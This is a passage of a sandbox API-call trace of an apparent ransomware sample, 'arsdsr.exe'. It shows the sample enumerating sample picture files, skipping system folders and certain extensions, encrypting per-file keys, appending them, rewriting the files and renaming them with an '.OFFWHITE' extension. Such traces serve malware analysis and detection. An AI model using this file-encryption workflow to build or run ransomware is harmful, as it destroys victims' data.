lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="ntuser.dat") returned -1 [0154.012] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="programdata") returned -1 [0154.012] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="appdata") returned 1 [0154.013] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="program files") returned -1 [0154.013] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="program files (x86)") returned -1 [0154.013] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\" [0154.013] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Hydrangeas.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" [0154.013] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.013] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.013] PathFindExtensionW (pszPath="Hydrangeas.jpg") returned=".jpg" [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0154.013] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0154.013] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0154.013] GetProcessHeap () returned 0x500000 [0154.013] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543ed8 [0154.014] CreateFileW (lpFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0154.015] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=595284) returned 1 [0154.015] GetProcessHeap () returned 0x500000 [0154.015] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0154.015] GetProcessHeap () returned 0x500000 [0154.015] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0154.015] GetProcessHeap () returned 0x500000 [0154.015] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0154.015] GetProcessHeap () returned 0x500000 [0154.015] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0154.015] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.015] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.015] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0154.015] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.015] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.015] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0154.015] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.015] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.015] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0154.016] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.016] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.016] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0154.016] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x91554, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.016] SetLastError (dwErrCode=0x0) [0154.016] WriteFile (in: hFile=0x21c, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.019] GetLastError () returned 0x0 [0154.019] GetLastError () returned 0x0 [0154.019] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x91654, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.019] WriteFile (in: hFile=0x21c, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.019] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x91754, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.019] WriteFile (in: hFile=0x21c, lpBuffer=0x543ed8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x543ed8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0154.019] GetProcessHeap () returned 0x500000 [0154.019] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x91554) returned 0x2a60020 [0154.020] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.020] ReadFile (in: hFile=0x21c, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x91554, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295dec0*=0x91554, lpOverlapped=0x0) returned 1 [0154.070] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.070] WriteFile (in: hFile=0x21c, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x91554, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295decc*=0x91554, lpOverlapped=0x0) returned 1 [0154.072] GetProcessHeap () returned 0x500000 [0154.072] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0154.075] CloseHandle (hObject=0x21c) returned 1 [0154.075] GetProcessHeap () returned 0x500000 [0154.075] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0154.075] GetProcessHeap () returned 0x500000 [0154.075] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0154.075] GetProcessHeap () returned 0x500000 [0154.075] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0154.075] GetProcessHeap () returned 0x500000 [0154.076] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0154.076] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" [0154.076] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.OFFWHITE") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.OFFWHITE" [0154.076] MoveFileW (lpExistingFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.OFFWHITE" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.offwhite")) returned 1 [0154.076] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="Jellyfish.jpg", cAlternateFileName="JELLYF~1.JPG")) returned 1 [0154.076] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".") returned 1 [0154.076] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="..") returned 1 [0154.076] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="...") returned 1 [0154.077] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="windows") returned -1 [0154.077] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="$recycle.bin") returned 1 [0154.077] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="rsa") returned -1 [0154.077] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="ntuser.dat") returned -1 [0154.077] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="programdata") returned -1 [0154.077] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="appdata") returned 1 [0154.077] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="program files") returned -1 [0154.077] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="program files (x86)") returned -1 [0154.077] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\" [0154.077] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Jellyfish.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" [0154.077] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.077] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.077] PathFindExtensionW (pszPath="Jellyfish.jpg") returned=".jpg" [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0154.077] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0154.077] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0154.078] GetProcessHeap () returned 0x500000 [0154.078] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543ee8 [0154.078] CreateFileW (lpFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0154.079] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=775702) returned 1 [0154.079] GetProcessHeap () returned 0x500000 [0154.079] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0154.079] GetProcessHeap () returned 0x500000 [0154.079] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0154.079] GetProcessHeap () returned 0x500000 [0154.079] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0154.079] GetProcessHeap () returned 0x500000 [0154.079] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0154.079] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.079] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.079] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0154.079] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.079] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.079] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0154.079] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.079] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.079] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0154.080] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.080] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.080] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0154.080] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xbd616, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.080] SetLastError (dwErrCode=0x0) [0154.080] WriteFile (in: hFile=0x21c, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.082] GetLastError () returned 0x0 [0154.082] GetLastError () returned 0x0 [0154.082] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xbd716, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.082] WriteFile (in: hFile=0x21c, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.082] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xbd816, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.082] WriteFile (in: hFile=0x21c, lpBuffer=0x543ee8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x543ee8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0154.082] GetProcessHeap () returned 0x500000 [0154.082] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xbd616) returned 0x2a60020 [0154.083] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.083] ReadFile (in: hFile=0x21c, lpBuffer=0x2a60020, nNumberOfBytesToRead=0xbd616, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295dec0*=0xbd616, lpOverlapped=0x0) returned 1 [0154.150] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.150] WriteFile (in: hFile=0x21c, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0xbd616, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295decc*=0xbd616, lpOverlapped=0x0) returned 1 [0154.152] GetProcessHeap () returned 0x500000 [0154.152] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0154.156] CloseHandle (hObject=0x21c) returned 1 [0154.156] GetProcessHeap () returned 0x500000 [0154.156] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0154.156] GetProcessHeap () returned 0x500000 [0154.156] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0154.156] GetProcessHeap () returned 0x500000 [0154.156] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0154.156] GetProcessHeap () returned 0x500000 [0154.156] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0154.156] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" [0154.157] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.OFFWHITE") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.OFFWHITE" [0154.157] MoveFileW (lpExistingFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.OFFWHITE" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.offwhite")) returned 1 [0154.157] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="Koala.jpg", cAlternateFileName="")) returned 1 [0154.157] lstrcmpiW (lpString1="Koala.jpg", lpString2=".") returned 1 [0154.157] lstrcmpiW (lpString1="Koala.jpg", lpString2="..") returned 1 [0154.158] lstrcmpiW (lpString1="Koala.jpg", lpString2="...") returned 1 [0154.158] lstrcmpiW (lpString1="Koala.jpg", lpString2="windows") returned -1 [0154.158] lstrcmpiW (lpString1="Koala.jpg", lpString2="$recycle.bin") returned 1 [0154.158] lstrcmpiW (lpString1="Koala.jpg", lpString2="rsa") returned -1 [0154.158] lstrcmpiW (lpString1="Koala.jpg", lpString2="ntuser.dat") returned -1 [0154.158] lstrcmpiW (lpString1="Koala.jpg", lpString2="programdata") returned -1 [0154.158] lstrcmpiW (lpString1="Koala.jpg", lpString2="appdata") returned 1 [0154.158] lstrcmpiW (lpString1="Koala.jpg", lpString2="program files") returned -1 [0154.158] lstrcmpiW (lpString1="Koala.jpg", lpString2="program files (x86)") returned -1 [0154.158] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\" [0154.158] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Koala.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" [0154.158] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.158] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.158] PathFindExtensionW (pszPath="Koala.jpg") returned=".jpg" [0154.158] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0154.158] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0154.158] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0154.158] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0154.158] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0154.158] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0154.158] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0154.158] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0154.158] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0154.158] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0154.158] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0154.158] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0154.159] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0154.159] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0154.159] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0154.159] lstrcmpiW (lpString1="Koala.jpg", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0154.159] GetProcessHeap () returned 0x500000 [0154.159] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543ef8 [0154.159] CreateFileW (lpFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0154.159] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=780831) returned 1 [0154.159] GetProcessHeap () returned 0x500000 [0154.159] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0154.159] GetProcessHeap () returned 0x500000 [0154.159] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0154.159] GetProcessHeap () returned 0x500000 [0154.159] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0154.159] GetProcessHeap () returned 0x500000 [0154.159] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0154.160] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.160] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.160] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0154.160] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.160] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.160] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0154.160] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.160] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.160] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0154.160] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.160] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.160] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0154.160] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xbea1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.161] SetLastError (dwErrCode=0x0) [0154.161] WriteFile (in: hFile=0x21c, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.163] GetLastError () returned 0x0 [0154.163] GetLastError () returned 0x0 [0154.163] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xbeb1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.163] WriteFile (in: hFile=0x21c, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.163] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xbec1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.163] WriteFile (in: hFile=0x21c, lpBuffer=0x543ef8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x543ef8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0154.164] GetProcessHeap () returned 0x500000 [0154.164] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xbea1f) returned 0x2a60020 [0154.164] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.164] ReadFile (in: hFile=0x21c, lpBuffer=0x2a60020, nNumberOfBytesToRead=0xbea1f, 